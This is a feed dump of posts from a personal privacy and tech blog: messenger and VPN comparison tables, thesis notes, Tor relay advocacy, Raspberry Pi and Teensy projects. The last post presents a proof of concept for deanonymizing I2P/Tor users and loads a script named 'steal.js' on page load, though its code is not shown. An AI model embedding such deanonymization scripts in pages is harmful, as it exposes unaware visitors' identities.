<p>With the announcement of the old <a href="https://flattr.com">Flattr</a> crews (bonq, brokep and leihogs) new privacy messenger application <a href="https://heml.is">Heml.is</a> (kid Swedish for secret), I have run in to some of the different alternatives for End-to-End encrypted messenger applications. Here is a short list of some of the ones that are out there.</p>
<table style="border:1px solid black;">
<tr>
<td><strong>Name</strong></td>
<td> <strong>Price</strong> </td>
<td> <strong>Tech</strong> </td>
<td> <strong>Platforms</strong> </td>
<td> <strong>Open Source</strong> </td>
<td><strong>Other</strong> </td>
</tr>
<tr>
<td><a href="https://telegram.org">Telegram</a> </td>
<td> Free </td>
<td> <a href="https://core.telegram.org/techfaq">MTProto + <span class="caps">RSA</span> 2048 + 256 <span class="caps">AES</span></a> </td>
<td> iOS / Android </td>
<td> Open Source </td>
<td> Need to manually specify when secure communication is wanted </td>
</tr>
<tr>
<td><a href="https://heml.is/">Hemlis</a> </td>
<td> Freemium </td>
<td> <span class="caps">XMPP</span> / <span class="caps">PGP</span> </td>
<td> iOS / Android </td>
<td> The source will be released </td>
<td> Not released yet, fundraiser on website </td>
</tr>
<tr>
<td><a href="https://www.surespot.me/">surespot</a></td>
<td> Free </td>
<td> 521 bit <span class="caps">ECDH</span> + 256 <span class="caps">AES</span> </td>
<td> Android </td>
<td> <a href="https://github.com/surespot/android">Yes</a> </td>
<td> &#8211; </td>
</tr>
<tr>
<td> <a href="https://www.whispersystems.org/">TextSecure</a> </td>
<td> Free </td>
<td> <span class="caps">SMS</span>. Encrypted storage </td>
<td> Android </td>
<td> <a href="https://github.com/WhisperSystems/TextSecure/">Yes</a> </td>
<td> <a href="https://github.com/WhisperSystems/TextSecure-iOS">iOS version in the making</a>. Made by <a href="http://thoughtcrime.org/">Moxie</a>, everyone loves Moxie</td>
</tr>
<tr>
<td> <a href="https://dev.guardianproject.info/projects/gibberbot">Gibberbot</a> </td>
<td> Free </td>
<td> <span class="caps">XMPP</span> + <a href="http://www.cypherpunks.ca/otr/"><span class="caps">OTR</span></a> </td>
<td> Android (open protocol so can talk to any client) </td>
<td> <a href="https://github.com/guardianproject/Gibberbot">Yes</a> </td>
<td> Needs third party <span class="caps">XMPP</span> server </td>
</tr>
<tr>
<td> <a href="https://silentcircle.com">Silent Text</a> </td>
<td> $240 / y </td>
<td> <a href="https://silentcircle.com/static/download/SCIMP%20paper.pdf"><span class="caps">SCIMP</span></a> + <a href="https://silentcircle.com/web/security/">more on encryption</a> </td>
<td> iOS / Android </td>
<td> <a href="https://github.com/SilentCircle/silent-text">Partly</a> </td>
<td> </td>
</tr>
<tr>
<td> <a href="http://threema.ch/en/">Threema</a> </td>
<td> € 1.61 </td>
<td> Elliptic Curve Cryptography via <a href="http://nacl.cr.yp.to/">NaCL</a>. Forward security </td>
<td> iOS / Android </td>
<td> No </td>
<td> Payable with bitcoin </td>
</tr>
<tr>
<td><a href="http://kontalk.org/">Kontalk</a></td>
<td> Free </td>
<td> <span class="caps">XMPP</span> </td>
<td> Android </td>
<td> <a href="https://code.google.com/p/kontalk/wiki/XMPP">Yes</a></td>
<td> Early alpha </td>
</tr>
<tr>
<td><a href="http://chrisballinger.info/apps/chatsecure/">ChatSecure</a> </td>
<td> Free </td>
<td> <span class="caps">XMPP</span>/<span class="caps">AIM</span> + <span class="caps">OTR</span> </td>
<td> iOS </td>
<td> <a href="https://github.com/chrisballinger/Off-the-Record-iOS">Yes</a> </td>
<td> </td>
</tr>
<tr>
<td><a href="https://tox.im/">Tox.im</a> </td>
<td> Free </td>
<td> <a href="http://wiki.tox.im/Crypto">Based on NaCl</a> </td>
<td> <a href="http://wiki.tox.im/Client">Linux/Android/Windows/<span class="caps">OSX</span>/iOS</a> </td>
<td> <a href="https://github.com/irungentoo/ProjectTox-Core">Yes</a> </td>
<td> Support video and audio </td>
</tr>
</table>
<p><strong>If you found this interesting</strong>, maybe you would enjoy reading my list over <a href="/all/personal/2013/06/25/privacy-aware-VPN-providers.html">privacy aware <span class="caps">VPN</span> providers</a> and <a href="/all/personal/2013/08/10/email-providers.html">non-US mailproviders</a>.</p>Privacy aware VPN providers2013-06-25T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/06/25/privacy-aware-VPN-providers<h2>Privacy aware <span class="caps">VPN</span> providers</h2>
<p class="publish_date">25 Jun 2013</p>
<p>To protect against traffic snooping/injection or other attacks on open networks (or from your <span class="caps">ISP</span> or government etc) it is a good idea to encrypt your traffic to a <em>&#8220;trusted&#8221;</em> end-node. This can be done with a <span class="caps">VPN</span> tunnel.</p>
<p>The services listed below provide <span class="caps">VPN</span> tunnel. They also have in common that they are <em>privacy aware</em>. They intentionally do not keep logs of users and assign you a random IP address. This has the added benefit of hiding <strong>where</strong> you are connecting from (from the website or services perspective). <a href="http://grugq.tumblr.com/post/73393664323/no-logs-earthvpn-user-arrested-after-police-finds">Please beware and read up on security issues concering anonymity before using one of a <span class="caps">VPN</span></a></p>
<table>
<tr>
<td>Provider</td>
<td> Price </td>
<td> Type </td>
<td> Country </td>
<td> Other </td>
</tr>
<tr>
<td><a href="https://www.ipredator.se/">Ipredator</a> </td>
<td> 150 <span class="caps">SEK</span> / 3 months </td>
<td> OpenVPN / <span class="caps">PPTP</span> </td>
<td> <a href="https://www.ipredator.se/page/legal">Cyprus / Sweden</a> </td>
<td> Also provide: <span class="caps">DNS</span>, jabber, http proxy etc </td>
</tr>
<tr>
<td><a href="https://integrity.st/">Integrity</a> </td>
<td> &#8211; </td>
<td> OpenVPN / <span class="caps">PPTP</span> </td>
<td> Sweden </td>
<td> Not live yet, announced by <a href="https://bahnhof.se/">Bahnof</a> </td>
</tr>
<tr>
<td><a href="https://mullvad.net/sv/">Mullvad</a> </td>
<td> 50 <span class="caps">SEK</span> / month </td>
<td> OpenVPN / <span class="caps">PPTP</span> </td>
<td> Sweden </td>
<td> Payable with bitcoin and cash </td>
</tr>
<tr>
<td> <a href="https://www.blackvpn.com/">BlackVPN</a> </td>
<td> 7.50 <span class="caps">EUR</span> / month </td>
<td>OpenVPN / <span class="caps">PPTP</span> / IPSec </td>
<td> <a href="https://www.blackvpn.com/about/terms-of-service/">Hong Kong</a> </td>
<td> Sell preconfigured routers. Choose end-point country. </td>
</tr>
<tr>
<td> <a href="https://www.riseup.net/en/riseup-vpn">RiseUp</a> </td>
<td> Donation based </td>
<td> OpenVPN </td>
<td> <span class="caps">USA</span> </td>
<td> Block third-party trackers </td>
</tr>
<tr>
<td> <a href="https://www.anonine.com/en">Anonine</a> </td>
<td> 42 <span class="caps">SEK</span> / month </td>
<td> OpenVPN / <span class="caps">PPTP</span> </td>
<td> Sweden </td>
<td> Payable with <span class="caps">SMS</span> </td>
</tr>
<tr>
<td> <a href="https://airvpn.org/">AirVPN</a> </td>
<td> 7 <span class="caps">EUR</span> / month ~ 15 <span class="caps">EUR</span> / 3 month </td>
<td> OpenVPN </td>
<td> <a href="https://airvpn.org/privacy/">Italy</a> </td>
<td> Accept bitcoin </td>
</tr>
<tr>
<td> <a href="https://www.privateinternetaccess.com/pages/buy-vpn/">Private Internet Access</a> </td>
<td> 6.95 <span class="caps">USD</span> / month </td>
<td> <span class="caps">PPTP</span> / OpenVPN / IPSec </td>
<td> <a href="https://www.privateinternetaccess.com/pages/terms-of-service/"><span class="caps">USA</span></a> </td>
<td> Accept bitcoin </td>
</tr>
<tr>
<td> <a href="https://cryptocloud.com/">Cryptocloud</a> </td>
<td> 19.95 <span class="caps">USD</span> / month </td>
<td> <span class="caps">PPTP</span> / OpenVPN </td>
<td> <a href="https://www.cryptocloud.com/contact.html"><span class="caps">USA</span></a> </td>
<td> Accept bitcoin </td>
</tr>
<tr>
<td> <a href="https://www.relakks.com/">Relakks</a> </td>
<td> 5 <span class="caps">EUR</span> / month </td>
<td> <span class="caps">PPTP</span> </td>
<td> <a href="https://www.relakks.com/faq/about/">Sweden</a> </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://perfect-privacy.com">Perfect Privacy</a> </td>
<td> 10.41 <span class="caps">EUR</span> / month (1 year subscription) </td>
<td> OpenVPN / <span class="caps">PPTP</span> / SSH2 / IPSec / <span class="caps">SOCK</span> proxy </td>
<td> Germany (?) </td>
<td> Accept bitcoin </td>
</tr>
<tr>
<td> <a href="https://www.ivpn.net/"><span class="caps">IVPN</span></a> </td>
<td> 15 <span class="caps">USD</span> / month (subscription) </td>
<td> OpenVPN / IPSec / L2TP </td>
<td> Malta </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://privatevpn.com/">PrivateVPN</a> </td>
<td> <a href="https://privatevpn.com/">7 <span class="caps">EUR</span> / month</a></td>
<td> OpenVPNi / <span class="caps">PPTP</span> </td>
<td> <a href="http://whois.net/whois/privatevpn.com">Sweden</a> </td>
<td> Servers in many countries, able to choose </td>
</tr>
<tr>
<td> <a href="https://ivacy.com/">Ivacy</a> </td>
<td> <a href="https://ivacy.com/">1 <span class="caps">EUR</span> / year (50MB/day) or 9.95 <span class="caps">EUR</span> / month</a> </td>
<td> OpenVPN and IPSec (only for russian server) / <span class="caps">PPTP</span> </td>
<td> (?) </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://www.tunnelbear.com/">TunnelBear</a> </td>
<td> <a href="https://www.tunnelbear.com/pricing/">Free (500MB/month) or 4.99 <span class="caps">USD</span>/month</a> </td>
<td> <span class="caps">IPSEC</span> / OpenVPN. <span class="caps">OSX</span>/wintendo/iOS/android support custom client</td>
<td> <a href="https://www.tunnelbear.com/about/">Canada</a> </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://en.kebrum.com">kebrum</a> </td>
<td> <a href="https://en.kebrum.com/prices">7 <span class="caps">USD</span>/month</a> </td>
<td> OpenVPN. <span class="caps">PPTP</span>/L2TP </td>
<td> <a href="https://en.kebrum.com/about">Seychelle</a> </td>
<td> </td>
</tr>
<tr>
<td> <a href="https://www.frootvpn.com">frootvpn</a> </td>
<td> Free </td>
<td> OpenVPN. <span class="caps">PPTP</span>/L2TP </td>
<td> <a href="https://www.frootvpn.com/faq/general-15.html">Sweden</a></td>
<td> Will cost in the future. Unable to find what company is behind it </td>
</tr>
</table>
<p>What logs the different <span class="caps">VPN</span> providers store varies. <strong>Read up on their privacy and logging policy</strong>.</p>
<p><strong>For example:</strong> BlackVPN store <em>&#8220;The internal RFC1918 (https://tools.ietf.org/html/rfc1918) IP address assigned by us to a particular user at each time&#8221;</em> this means that if they are forced to do so, by law, they can point out what user was logged on to what IP address at that time. <strong>If that information is connected to you is up to yourself</strong>, since the other thing they store is your email address. They do not store the credit-card information, but if they are forced to do so they could simply wait until the next time you enter the information to renew your subscription. It is probably wise to create new users each time you pay and use new email addresses to make sure that the account is not easily connectable to you.</p>
<p><strong>Also</strong>: Please note that <a href="https://www.cloudcracker.com/blog/2012/07/29/cracking-ms-chap-v2/"><span class="caps">PPTP</span> can be considered broken</a> and should not be used if there are alternatives.</p>
<p><strong>If you found this interesting</strong>, maybe you would enjoy reading my list over <a href="/all/personal/2013/07/10/end-2-end-encrypted-messenger-apps.html">end-to-end encrypted messenging applications</a> and <a href="/all/personal/2013/08/10/email-providers.html">non-US mailproviders</a>.</p>
<p><strong>This list is getting a bit dated, there are some other <a href="https://www.vpnmentor.com/bestvpns/overall/">comparison lists</a> that are more current but I can not vouch for the content</strong></p>Master thesis presentation2013-06-08T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/06/08/master-thesis-presentation<h2>Master thesis presentation</h2>
<p class="publish_date">08 Jun 2013</p>
<p>I will be presenting my Master thesis in Computer Science on the subject of <em>Recommender systems for mobile appstores</em> on Tuesday (11/6) at 11.15.</p>
<p>It is an open event so anyone who cares to come and listen is welcome, preferably send me an <a href="christopher.kack@gmail.com">email</a> with an <span class="caps">RSPV</span> so I can make sure there are enough chairs for everyone.</p>
<p>A map to the location on <span class="caps">LTH</span> can be found <a href="http://cs.lth.se/kalendarium/">here</a></p>
<p><strong>Update</strong><br />
The presentation was approved! [<a href="http://blog.kejsarmakten.se/misc/exjobb/">Slides</a>]</p>Disable suspend-to-disk on OS X2013-06-06T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/06/06/suspend-to-disk<h2>Disable suspend-to-disk on OS X</h2>
<p class="publish_date">06 Jun 2013</p>
<p><strong>Update</strong><br />
So <a href="http://apple.stackexchange.com/questions/93283/is-suspend-to-disk-memory-dump-encrypted-when-using-filevault2">it seems like the memory is stored encrypted on the drive when sleeping the computer with FileVault2</a>.</p>
<p>Good, so here is a guide for you who would like to save the storage space on your disks:</p>
<p><strong>Old entry</strong></p>
<p>Somewhat annoyed that I was unable to find any good info on whether OS X saves the memory dump to disk unencrypted or not when it suspends to disk (when using filevault2). This happens when the computer sleeps and power runs low.</p>
<p>To prevent cold boot attacks I decided to remove the functionality.</p>
<p>First I removed the image already saved to disk</p>
<pre class="prettyprint">
sudo rm -P /var/vm/sleepimage
</pre>
<p>Then I shut down the <a href="https://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man1/pmset.1.html">functionality</a>, so now it only sleeps with power on the memory, if battery runs low it shuts down and we lose the state we where in.</p>
<pre class="prettyprint">
sudo pmset -a hibernatemode 0
</pre>
<p>If anyone can confirm that the memory dump is stored encrypted then please let me know since it would be a nice feature to turn back on.</p>Similarity functions for user-based collaborative recommendations2013-05-12T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/05/12/similarity-functions<h2>Similarity functions for user-based collaborative recommendations</h2>
<p class="publish_date">11 May 2013</p>
<p>This is from my <a href="/all/personal/2013/03/25/busy-withmachine-learning.html">master thesis</a> where I am writing about recommender systems.<br />
Here are some rankscore results (ten-folds, tested on historical data, <a href="http://www.recommenderbook.net/recommender-systems-introduction">read more on evaluation in this great book</a>) after using different similarity functions with a simple user-based collaborative filtering algorithm.<br />
The vectors are binary or, when noted, weighted with the weight 1 / (total downloads) and based on implicit feedback (downloads).</p>
<div style='font-family:"Lucida Console", Monaco, monospace' >
<table>
<tr>
<td>Similarity function</td>
<td> Rankscore</td>
</tr>
<tr>
<td>Euclidian distance</td>
<td>0.171801575012</td>
</tr>
<tr>
<td>Euclidian distance (weighted)</td>
<td>0.177710916698</td>
</tr>
<tr>
<td>Tanimoto Coefficient</td>
<td>0.129399988285</td>
</tr>
<tr>
<td>Cosine similarity</td>
<td>0.179036040926</td>
</tr>
<tr>
<td>Cosine similarity (weighted)</td>
<td>0.212398453763</td>
</tr>
</table>
<br /></div>
<p>Note that <a href="https://en.wikipedia.org/wiki/Cosine_similarity">cosine similarity</a> performs very well on my dataset, even though it is a user-based algorithm (rather than item-based).<br />
I am not using <a href="https://en.wikipedia.org/wiki/Pearson_product-moment_correlation_coefficient">Pearson correlation</a> since my input is binary vectors.</p>
<p>I will publish my thesis here in June if you wish to learn more about the dataset, recommender algorithms, weighting techniques and evaluation functions.</p>Bayesian spam filter2013-05-02T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/05/02/spam<h2>Bayesian spam filter</h2>
<p class="publish_date">4 May 2013</p>
<p>I have forgotten to mention that I wrote a small <a href="https://github.com/melpomene/spam">python spam filter</a> a while back.</p>
<p>It is very simple and written in Python. Mainly because I wanted to see what fields <a href="http://spamsamlaren.kejsarmakten.se/">other than classic spam</a> I could apply a spam filter <a href="http://www.paulgraham.com/spam.html">as outlined by Paul Graham</a> to.</p>The TOR projects needs more relays2013-04-27T00:00:00+02:00http://blog.kejsarmakten.se/all/personal/2013/04/27/TOR-network-needs-relays<h2>The <span class="caps">TOR</span> projects needs more relays</h2>
<p class="publish_date">27 Apr 2013</p>
<p>A concrete way to help people living under censorship and surveillance is to set up a <a href="https://www.torproject.org/docs/tor-doc-relay.html.en"><span class="caps">TOR</span> Relay</a>.</p>
<p><a href="http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/"><span class="caps">TOR</span> project needs more bridges</a> to be able to help users evade deep packet inspections and blocklists.</p>
<p>If you have a computer which is often running, then try installing a <span class="caps">TOR</span> relay on it! It is a simple and concrete way to help out. <br />
If you do not have such a computer then you could buy a small <a href="http://www.raspberrypi.org/">raspberry pi</a> and <a href="http://lifehacker.com/5953155/use-a-raspberry-pi-as-a-tor-relay-and-help-others-browser-anonymously">run it as relay</a>.</p>
<p>If you live in Sweden you can even send it to the great people over at <a href="https://fsdata.se/blogg/gratis-colocation-med-raspberry-pi/">FS-Data which provide free colocation of raspberry pi&#8217;s</a> (they give you free internet connection and power supply if you send in your rbp).</p>
<p>If you feel it is to much work setting up a <span class="caps">TOR</span> relay (it&#8217;s not!), or you are otherwise unable to, then you can help out by donating to others who use the money to run relays; like <a href="http://www.torservers.net/">torservers.net</a> or <a href="http://tor.noisebridge.net/">noisebridge</a></p>
<p><strong>Remember:</strong> if you run the relay as a bridge or as an internal node all <span class="caps">TOR</span> traffic leaving you will be encrypted so you do not have to worry about your <span class="caps">ISP</span> or local authorites thinking your traffic looks suspicious.</p>UTF-8 strings in WEKA2013-04-20T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/04/20/utf-8-and-WEKA<h2><span class="caps">UTF</span>-8 strings in <span class="caps">WEKA</span></h2>
<p class="publish_date">20 Apr 2013</p>
<p>Working on question classification for a project course in <a href="http://cs.lth.se/edan50">intelligent systems</a> I bumped in to some issues with loading <span class="caps">UTF</span>-8 in <span class="caps">ARFF</span>-files into <a href="http://www.cs.waikato.ac.nz/ml/weka/"><span class="caps">WEKA</span></a>.</p>
<p><strong>Simpel solution</strong>: Switch to using <a href="http://weka.wikispaces.com/XRFF"><span class="caps">XRFF</span></a> format where you can explicitly declare encoding (<em>No one like <span class="caps">XML</span>, I know, but desperate times call for desperate measures</em>).</p>Check RSS/ATOM reader IP address2013-04-08T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2013/04/08/rss-reader-ip<h2>Check <span class="caps">RSS</span>/<span class="caps">ATOM</span> reader IP address</h2>
<p class="publish_date">08 Apr 2013</p>
<p>Since I got the news that Google Reader was closing I have moved to <a href="http://www.rssowl.org/">RSSOwl</a> for my <span class="caps">RSS</span>/<span class="caps">ATOM</span> feed needs.</p>
<p><a href="http://www.rssowl.org/"
title="Get RSSOwl - Powerful RSS / RDF / Atom News Feed Reader."><br />
<img
src="http://www.rssowl.org/images/contribute/getrssowl_large"
style="border:0;" width="178" height="60" alt="Get RSSOwl"><br />
</a></p>
<p>It feels really good to reclaim my data from google, but one feature I am missing is the anonymization that the google crawler provided. To reclaim some of this I am running the <span class="caps">RSS</span> reader over <a href="https://www.torproject.org/">Tor</a> (I am getting <a href="http://sourceforge.net/p/rssowl/discussion/296909/thread/3f1b4787/">possible <span class="caps">DNS</span> leakage warnings from Vidalia</a>. Have not had time to verify this yet though).<br />
To verify that the Tor Proxy is used I created a small <span class="caps">ATOM</span> feeds which tells you what IP address you are accessing it from.</p>
<p><a href="http://links.kejsarmakten.se/ip/atom.php">Feel free to use it if you like</a></p>Writing Master Thesis on recommender systems2013-03-25T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2013/03/25/busy-withmachine-learning<h2>Writing Master Thesis on recommender systems</h2>
<p class="publish_date">15 Mar 2013</p>
<p>I am just writing this to let you know why the blog is so silent at the moment.</p>
<p>Right now I am writing my Master Thesis together with <a href="http://www.stickybit.se">Stickybit</a> in Malmö on the super interesting subjects of <a href="https://en.wikipedia.org/wiki/Recommender_system">Recommender systems</a>.<br />
This consumes most of my time right now.</p>
<p>Besides this I am taking part in a project course called <a href="http://cs.lth.se/edan50">Intelligent Systems</a> where we are building a question classifier for a Swedish <a href="https://www.youtube.com/watch?v=WFR3lOm_xhE"><span class="caps">WATSON</span></a> project.</p>
<p>So I am swamped in some amazingly fun machine learning problems right now (which makes it extra hard to focus on my exam in Signal Processing now during the Easter holidays).</p>
<p>I promise to provide a summary of the results on both projects when they are done.</p>BitStash - Privacy on Mac2013-02-26T00:00:00+01:00http://blog.kejsarmakten.se/all/projects/2013/02/26/BitStash<h2>BitStash &#8211; Privacy on Mac</h2>
<p class="publish_date">26 Feb 2013</p>
<p>So the time has come for me to release a sideproject I have been tinkering with a while: <a href="http://hidesh.it/">BitStash</a>.<br />
<iframe src="http://player.vimeo.com/video/60469999" width="500" height="281" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe></p>
<p>It is a application that runs on the <span class="caps">JVM</span> and lets the users, in a simple way, create/remove and open/close encrypted volumes.<br />
It also have some log sanitation capabilites to help users cover their tracks on their mac&#8217;s.</p>
<p>It is currently on <a href="http://hidesh.it/#buy">beta sale for only $8 here</a></p>Bitcoin and accountability2013-01-03T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2013/01/03/bitcoin-and-accountability<h2>Bitcoin and accountability</h2>
<p class="publish_date">03 Jan 2013</p>
<p>I am back from <strong>29c3</strong> and I had a blast!<br />
I just wanted to clear something up that was mentioned during an interesting talk by <strong>Eleanor Saitta</strong> and <strong>Smári McCarthy</strong> called <a href="http://events.ccc.de/congress/2012/Fahrplan/events/5305.en.html">Long live the protocoletariat!</a> (the unedited stream can be <a href="ftp://wtf1.muling.lu/Saal_6/Day_3/5305-long_live_the_protocoletariat.wmv.torrent">downloaded from here</a>).</p>
<p>It was just a side note in the talk but it seems to be a common misconseption, they claimed that it was not possible to hold people accountable for taxation if they where using bitcoins, and thus it was something bad. A person from the audience later asked how this differ from cash then, and got the answer along the lines (cited from memory, so please correct me if I am wrong): <em>&#8220;With cash the State can go the store and say &#8216;we think you earn this much but you have not taxated for all of that so now you owe us money until you prove us wrong&#8217;. Then the store accepting cash is forced to prove that they have not earned that much money etc&#8221;</em>. The question was cut short so we never got an answer to why this could not be done for Bitcoin.</p>
<p>My initial reaction is that this process would be much much easier with bitcoins than with cash, make the process even simpler for the taxating authorities. I think that maybe the speakers does not think this is the case due to lack of understanding of the bitcoin protocol. I have tried to get in touch with the speakers <a href="https://twitter.com/kejsarmakten/status/285078657939165185">over</a> <a href="https://twitter.com/kejsarmakten/status/285078840525598721">Twitter</a> but have not gotten an answer yet. So I just thought I put my theory here to get a discussion going if someone else agrees with the speakers and care to explain why.<br />
The process of tracking what a store has earned has become alot easier with the bitcoin protocol since each node in the network has <span class="caps">ALL</span> the traffic data, this means that all transactions between differnet public keys are public and can be examined by anyone, even third parties. So if a store has a bitcoin adress on their website it is easy to see exactly how much that public key has earned and what public keys the payment came from and where the coins have gone since then.<br />
The store can prove ownership of the public key if it would be needed by signing something with the private key belonging to that address.</p>
<p>I do not see how bitcoins would make it any harder for the taxation authorites to do their job (compared to cash), it makes the job easier.</p>
<p><strong>What are your thoughs on this?</strong></p>CCC: Not my department2012-12-01T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2012/12/01/ccc<h2><span class="caps">CCC</span>: Not my department</h2>
<p class="publish_date">01 Dec 2012</p>
<center><a href="https://events.ccc.de/congress/2012"><img src="/images/ccc.png" /></a></center>
<p>Booked and ready for <a href="https://events.ccc.de/congress/2012"><span class="caps">CCC</span></a> this year.</p>
<p>Let me know if you&#8217;d like to meet up or if there is some talk/workshop I shouldn&#8217;t miss.</p>Resizing the Raspberry Pi SD card2012-11-28T00:00:00+01:00http://blog.kejsarmakten.se/all/software/2012/11/28/resizing-raspberry-pi-sd-card<h2>Resizing the Raspberry Pi SD card</h2>
<p class="publish_date">28 Nov 2012</p>
<p>Yesterday I finally got my raspberry pi from RS.<br />
Due to the (very) long wait they upgraded it to a 500MB version instead of the ordered 256MB.</p>
<p>I also got a 4GB SD card with the OS pre-installed on. After a apt-get upgrade I noticied that I was out of diskspace. It seems that even though they ship the SD card on a 4GB SD card they have only installed the diskimage on 2GB and the rest was left unallocated. Weird.</p>
<p>It is rather simple to fix this if you have a Linux running computer with a SD card reader laying about. As it happens, I have just that. This is how you go about resizing the disk image.</p>
<p>First insert the SD card in the reader and start <strong>gparted</strong> (if you haven&#8217;t got it and you are running a debian distro simply <strong>apt-get install gparted</strong>).</p>
<p><strong><span class="caps">REMEBER</span> TO BE <span class="caps">CAREFULL</span> <span class="caps">AND</span> <span class="caps">ALWAYS</span> <span class="caps">BACK</span> UP <span class="caps">YOUR</span> <span class="caps">DATA</span> <span class="caps">BEFORE</span> <span class="caps">PLAYING</span> <span class="caps">WITH</span> <span class="caps">GPARTED</span></strong></p>
<p>It will look something like this (this is from the official gparted repository).<br />
<center><a href="http://gparted.sourceforge.net/screens/gparted_1_big.png"><img src="http://gparted.sourceforge.net/screens/gparted_1_big.png" width="500px" /></a></center></p>
<p>Select in the upper right list your SD card. Then you will see a list of about four rows. On of these is a <em>ext4</em> file system. Right click and unmount this if your OS has mounted it already.</p>
<p>When this is done right click the ext4 row and press &#8220;Resize/move&#8221;. A new window will pop up. Here you can increase the size to what you desire, either by dragging the line on the right or by manual input in the boxes.</p>
<p>When this is done you now have to <em>commit</em> the changes you have made by pressing <strong>Edit</strong> in the menu and <strong>Apply All Operations</strong>.</p>
<p>Now you are done! Eject the SD card and insert it into your Raspberry pi and boot it up.</p>
<p>For inspiration on what to do with your newly bought raspberry pi I suggest that you check out <a href="/all/projects/2012/11/05/balcony-gardening.html">my blog post were I built a automatic watering system</a> or why not make it into a nice little <a href="http://www.irongeek.com/i.php?page=security/raspberry-pi-i2p-svartkast">svartkast?</a></p>
<p>Also note that it is possible to do this from the raspbian boot menu now, check the end of this video.</p>
<p><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/aTQjuDfEGWc" frameborder="0" allowfullscreen></iframe></p>Cyanogenmod on HTC Hero2012-11-24T00:00:00+01:00http://blog.kejsarmakten.se/all/personal/2012/11/24/cyanogenmod-htc-hero<h2>Cyanogenmod on <span class="caps">HTC</span> Hero</h2>
<p class="publish_date">24 Nov 2012</p>
<p>Today I installed <a href="http://cyanogenmod.org">Cyanogenmod</a> on an old <span class="caps">HTC</span> <span class="caps">HERO</span> (<span class="caps">GSM</span>) phone I had lying about.</p>
<p>I followed the guide <a href="http://wiki.cyanogenmod.org/wiki/HTC_Hero_%28GSM%29:_Full_Update_Guide">called ClockworkMod here</a>.<br />
It didn&#8217;t work the first time, I got an error in the last step which said &#8220;Illegal instruction /data/local/flas&#8230;&#8221; and when I tried to boot into the recovery mode I got stuck on a screen that looked like this. <br />
<center><br />
<img width="400" src="/images/cm-error.jpg"></img></p>
</center>
<p>Then I found <a href="http://forum.cyanogenmod.org/topic/28269-illegal-instruction/">this old forum thread</a> which solved the problem for me.</p>
<p><i>For me, it was something about the flash_image binary. The one downloaded from <span class="caps">HTC</span> Hero Full Update wiki page was causing this. Later I&#8217;ve found different flash_image binary on CyanogenMod Flash_Image wiki, and that one worked for me.</i> &#8211; unj</p>
<p>When I switched to the flash image mentioned in the post the problem went away.</p>
<p><a href="http://wiki.cyanogenmod.org/wiki/Flash_image">Here is a link to the flash image.</a></p>
<center>
<p><img width="400" src="/images/cm.jpg"></img></p>
</center>Balcony gardening automatic watering system2012-11-05T00:00:00+01:00http://blog.kejsarmakten.se/all/projects/2012/11/05/balcony-gardening<h2>Balcony gardening automatic watering system</h2>
<p class="publish_date">05 Nov 2012</p>
<p>Here is a first preview of a watering system we (my father and I) are building for my balcony garden (wormwood, sallad and tomatoes in the spring).</p>
<p>These two videos demo the pump that is controlled by a <a href="http://www.raspberrypi.org/">raspberrypi computer</a>.<br />
The videos are recorded with a <a href="http://gopro.com/hd-hero2-cameras/"><span class="caps">GOPRO</span> <span class="caps">HERO</span> 2</a>.<br />
<center><br />
<iframe src="http://player.vimeo.com/video/52855641?badge=0" width="500" height="281" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe><br />
<br />
<iframe src="http://player.vimeo.com/video/52855640?badge=0" width="500" height="281" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe></p>
</center>
<p>The battery for the pump is loaded with a solar panel.</p>
<p>The system will, when installed on the balcony, measure the moisture in the earth by measuring the resistance between to nails stuck into the pots.<br />
When they are dry the system will pump water from a container through a hose to the plants.</p>
<p>I will post updates to the project here.</p>
<p><strong>Update 7/11/2012</strong><br />
Deployed alpha on the balcony.<br />
<center><br />
<iframe src="http://player.vimeo.com/video/52976290?badge=0" width="500" height="889" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe></p>
</center>Generate Teensy key codes2012-10-19T00:00:00+02:00http://blog.kejsarmakten.se/all/projects/2012/10/19/teensy-code-generator<h2>Generate Teensy key codes</h2>
<p class="publish_date">10 Oct 2012</p>
<p>I wrote a script that convert the input string from stdin to a teensy C program that output that string in a loop as an emulated keyboard device.</p>
<p>Why? Well, it is annoying to translate what you want to type out from the teensy to the key codes by hand, so this script translates ascii text to the keys.<br />
Just copy the dictionary I made of the key codes if you want to tweak the translation or use it in another setting.</p>
<p><a href="https://github.com/melpomene/ToTeensyKeyboardLayoutConverter">The script can be found and downloaded here</a></p>
<p><a href="http://www.pjrc.com/teensy/">Read more about the awesome micro controller Teensy here</a></p>Proof of concept deanonymizing I2P/TOR users2012-10-11T00:00:00+02:00http://blog.kejsarmakten.se/all/software/2012/10/11/poc-i2p-deanon<h2>Proof of concept deanonymizing I2P/<span class="caps">TOR</span> users</h2>
<p class="publish_date">10 Oct 2012</p>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js"></script><script src="/js/steal.js"></script><p>This has a very small attack surface, but it is designed to show you how important it is to have proper settings on your I2P/<span class="caps">TOR</span> browser.</p>
<p>I used to have these bad settings myself so I am writing to make others aware of the danger. <br />
(<a href="http://www.youtube.com/watch?v=q4owyd_CaGc&amp;t=4m35s">This video at 4:35 shows how I had it set up when it was vunerable</a>)<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/q4owyd_CaGc" frameborder="0" allowfullscreen></iframe></p>
